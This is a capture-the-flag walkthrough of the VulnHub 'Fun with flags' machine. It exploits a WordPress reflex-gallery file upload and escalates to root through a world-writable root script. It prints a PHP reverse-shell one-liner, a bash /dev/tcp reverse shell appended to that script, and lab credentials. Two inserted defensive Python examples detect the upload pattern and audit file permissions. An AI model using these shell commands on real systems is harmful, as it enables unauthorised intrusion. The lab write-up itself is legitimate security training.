TBBT: Fun with flags Walkthrough

TBBT: Funwithflags

Before putting my hands on the machine I read its description on VulnHub, which says that DHCP is disabled and that the machine's IP is 192.168.1.105. So the first thing I did was set my Host Network Manager to the 192.168.1.1 IP series, and then I moved on to enumeration, since the IP of the machine is already given in the description.

Port Scanning

┌─[root@NITRO]─[~]
└──╼ #nmap -v -A -p- 192.168.1.105

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-17 02:06 IST
Nmap scan report for 192.168.1.105
Host is up (0.00032s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 539 Mar 04 00:11 Welcome.txt
| -rw-r--r-- 1 ftp ftp 114 Mar 04 00:13 ftp_agreement.txt
|_drwxr-xr-x 9 ftp ftp 4096 Mar 04 00:09 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cf:5c:ee:76:7c:48:52:06:8d:56:07:7f:f6:5d:80:f2 (RSA)
| 256 ab:bb:fa:f9:89:99:02:9e:e4:20:fa:37:4f:6f:ca:ca (ECDSA)
|_ 256 ea:6d:77:f3:ff:9c:d5:dd:85:e3:1e:75:3c:7b:66:47 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 4 disallowed entries
|_/howard /web_shell.php /backdoor /rootflag.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fun with flags!
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :.....

Here the result clearly says that FTP has anonymous login enabled. I moved on to FTP and started enumerating inside it, but it was not that helpful: I only found a few flags and hints that I had no idea about at the time.

At the end of the nmap result, port 1337 is clearly saying something, so I just had a look at this port using telnet.

┌─[root@NITRO]─[~]
└──╼ #telnet 192.168.1.105 1337

Trying 192.168.1.105...
Connected to 192.168.1.105.
Escape character is '^]'.
FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
Connection closed by foreign host.

Here I found the Sheldon flag on this port, as it was also present in the nmap result.

Moving ahead to the web at “http://192.168.1.105/”, what I found is a picture from the show “The Big Bang Theory”.

http://funwithflags/

Nothing interesting is available here, so I moved on to scanning for directories that might give some help to go on.

┌─[✗]─[root@NITRO]─[~]
└──╼ #dirb http://192.168.1.105
-----------------
DIRB v2.22
By The Dark Raver
-----------------

Here I got three interesting things. The first is the robots.txt file, which lists a few disallowed paths, but I did not find them useful at this point.

WordPress Time

As I also found that WordPress is available on the machine, I moved back to the terminal and started scanning the WordPress site with “wpscan”. I scanned for plugins and found one that is vulnerable as well as outdated.

┌─[root@NITRO]─[~]
└──╼ #wpscan --url http://192.168.1.105/music/wordpress -e p

The plugin “reflex-gallery” is outdated, at version 3.1.3, so without delay I searched for an exploit for it and found one, but the exploit is a .txt file which gives the details needed to exploit the plugin manually.

Reference : https://www.exploit-db.com/exploits/36374

The vulnerability is an Arbitrary File Upload.

Reading and understanding the exploit is not tough at all. I made a .html file, put in the code present in the exploit and opened it with a web browser.

file:///root/reflex.html

Here the directory path of the plugin is what makes it possible to upload the shell to the web server. After a little enumeration in the plugin's directory I found the php.php file, which seems interesting as it is saying something.

http://funwithflags/music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php

Uploading the PHP shell file is easy: just select the .php file and click on the Pwn! button.

Make sure to replace the path in the html file with the path to php.php, which is “http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php”.


Here the PHP shell file got uploaded to the machine successfully, and the path where it was stored is also shown there. Now it's time to call the shell file.

http://funwithflags/music/wordpress/wp-content/uploads/phhp.php

Here I started a listener on port 1234 and called the shell from the web. I used the following command to get the reverse shell:

php -r '$sock=fsockopen("192.168.1.1",1234);exec("/bin/bash -i <&3 >&3 2>&3");'

Now, having got the bash shell, I moved further:

┌─[root@NITRO]─[~]
└──╼ #nc -nlvp 1234
listening on [any] 1234 …
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.105] 59998
bash: cannot set terminal process group (1153): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tbbt:/var/www/html/music/wordpress/wp-content/uploads$
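As a defender's counterpart to the upload-and-call sequence above, here is an added Python example (not from the walkthrough) that scans Apache combined-format access log lines for a POST to the reflex-gallery FileUploader endpoint followed by a request for a .php file under wp-content/uploads, a directory that should only ever hold media. The log lines are constructed for the example.

```python
import re

# Constructed Apache combined-format log lines reproducing the flow from the
# walkthrough: a POST to the plugin's uploader, then a GET of the dropped PHP
# file under wp-content/uploads. These lines are made up for the example.
SAMPLE_LOG = """\
192.168.1.1 - - [17/Mar/2020:02:30:01 +0530] "GET /music/wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.1 - - [17/Mar/2020:02:31:10 +0530] "POST /music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.168.1.1 - - [17/Mar/2020:02:31:22 +0530] "GET /music/wordpress/wp-content/uploads/phhp.php HTTP/1.1" 200 44 "-" "Mozilla/5.0"
192.168.1.50 - - [17/Mar/2020:02:32:05 +0530] "GET /music/wordpress/wp-content/uploads/2020/03/cat.jpg HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_upload_abuse(log_text):
    """Return (kind, ip, path) alerts for (1) POSTs to the reflex-gallery
    uploader and (2) any request for a .php file inside wp-content/uploads,
    which WordPress never places there itself. A .php request from an IP that
    already hit the uploader is reported as upload_then_execute."""
    alerts = []
    uploader_ips = set()
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if not ev:
            continue
        path = ev["path"].split("?", 1)[0].lower()
        if ev["method"] == "POST" and path.endswith("/fileuploader/php.php"):
            uploader_ips.add(ev["ip"])
            alerts.append(("uploader_post", ev["ip"], ev["path"]))
        if "/wp-content/uploads/" in path and path.endswith(".php"):
            kind = "upload_then_execute" if ev["ip"] in uploader_ips else "php_in_uploads"
            alerts.append((kind, ev["ip"], ev["path"]))
    return alerts

if __name__ == "__main__":
    for alert in find_upload_abuse(SAMPLE_LOG):
        print(*alert)
```

The same pattern is worth blocking outright by denying execution of .php files under wp-content/uploads in the web-server configuration, so that a successful upload cannot be turned into a shell.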

With further enumeration I got a few flags at different locations.

www-data@tbbt:/var/ftp/pub/bernadette$ cat PENNY_README_ASAP.txt
cat PENNY_README_ASAP.txt
Penny the IT department from my Pharmaceutical company opened you an account in the B2B website.
You need to go there ASAP and learn our drugs for your interview tomorrow.
I dont remember the link, but it is easy you will find it!
Username: penny69
Password: cant post it here as sheldon said. you know the password. you use it everywhere.

While enumerating, meanwhile, I came across an interesting file that has all permissions: a .sh file in the directory named “leonard”. With some help from Google on privilege escalation I found the way to use it.

www-data@tbbt:/home/leonard$ ls -la
ls -la
total 24
drwxr-xr-x 2 leonard leonard 4096 Mar 6 00:47 .
drwxr-xr-x 10 root root 4096 Mar 4 02:33 ..
-rw------- 1 leonard leonard 0 Mar 6 00:47 .bash_history
-rw-r--r-- 1 leonard leonard 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 leonard leonard 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 leonard leonard 655 May 16 2017 .profile
-rwxrwxrwx 1 root root 484 Mar 6 00:23 thermostat_set_temp.sh

I appended a command to the executable .sh file to get a shell:

www-data@tbbt:/home/leonard$ echo "bash -i >& /dev/tcp/192.168.1.1/4321 0>&1" >> thermostat_set_temp.sh

In another terminal the listener is on.

┌─[✗]─[root@NITRO]─[~]
└──╼ #nc -nlvp 4321
listening on [any] 4321 …
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.105] 35304
bash: cannot set terminal process group (3409): Inappropriate ioctl for device
bash: no job control in this shell
root@tbbt:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@tbbt:~# whoami
whoami
root
root@tbbt:~#
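The root-owned, world-writable thermostat_set_temp.sh is the whole privilege-escalation story above, so here is an added defender-side Python example (not from the walkthrough) that walks a directory tree and reports world-writable regular files, ranking a root-owned executable or script as critical. demo() recreates the finding with constructed files in a temporary directory.

```python
import os
import stat
import tempfile

def classify(path, mode, uid):
    """Severity of a world-writable regular file, or None if it is not one.
    A root-owned executable that anyone can rewrite is the worst case: whatever
    root runs from it (cron, a service) runs the last writer's code."""
    if not stat.S_ISREG(mode) or not mode & stat.S_IWOTH:
        return None
    executable = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
    scriptish = path.endswith((".sh", ".py", ".pl"))
    if uid == 0 and (executable or scriptish):
        return "critical"
    return "high" if (executable or scriptish) else "medium"

def audit_tree(top):
    """Walk `top` and return (severity, path, octal mode, uid) for every
    world-writable regular file, worst first. Symlinks are not followed."""
    rank = {"critical": 0, "high": 1, "medium": 2}
    findings = []
    for dirpath, _dirs, files in os.walk(top):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            sev = classify(full, st.st_mode, st.st_uid)
            if sev:
                findings.append((sev, full, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return sorted(findings, key=lambda f: rank[f[0]])

def demo():
    """Recreate the walkthrough's finding with constructed files in a temp dir:
    a 0777 thermostat_set_temp.sh next to an ordinary 0644 .bashrc."""
    d = tempfile.mkdtemp()
    for name, mode in (("thermostat_set_temp.sh", 0o777), (".bashrc", 0o644)):
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/bash\n")
        os.chmod(p, mode)
    return [f[1] for f in audit_tree(d)]

if __name__ == "__main__":
    for finding in audit_tree("/home"):
        print(*finding)
```

Run audit_tree over /home, /etc and any directory referenced from root's crontab; a critical hit should have its mode tightened and its contents reviewed for appended commands, exactly the kind shown in this walkthrough.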

That looks pretty good. At this point I have root. Now, as the description of the VM says, there are 7 flags in total, without which the CTF is incomplete, so I started enumerating the flags again.

root@tbbt:~# cat FLAG-leonard.txt
cat FLAG-leonard.txt
____
/ \
/______\
||
/~~~~~~~~\ || /~~~~~~~~~~~~~~~~\
/~ () () ~\ || /~ () () () () ~\
(_)========(_) || (_)==== ===========(_)
I|_________|I _||_ |___________________|
.////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Another flag found.

root@tbbt:/var/www/html/private# cat db_config.php
cat db_config.php
<?php
// Create connection
$DBUSER = 'bigpharmacorp';
$DBPASS = 'weareevil';

After a little more enumeration I got the credentials for phpMyAdmin and the MySQL database.

root@tbbt:/var/www/html/private# mysql -u bigpharmacorp -p
mysql -u bigpharmacorp -p
Enter password: weareevil

One more flag found. Using the credentials I found in the wp-config.php file, I again logged in to MySQL and enumerated the next flag.

FLAG-raz{40d17a74e28a62eac2df19e206f0987c}

Now for the one last flag that was missing. I started enumerating again from the very beginning, where I had come across a file named super_secret_nasa_stuff_here.zip that I had already downloaded. I had tried to unzip it earlier, but the file is password protected, so I googled for a way to brute-force it and found the tool to do so.

┌─[root@NITRO]─[~]
└──╼ #fcrackzip -D -p /usr/share/wordlists/rockyou.txt super_secret_nasa_stuff_here.zip -u

Here I got all 7 flags as well as root on the machine. As the machine name says, “Fun with flags”, there is a lot of fun in finding the flags. I came across a few new concepts while solving the machine and finding the flags, and cleared up those concepts too.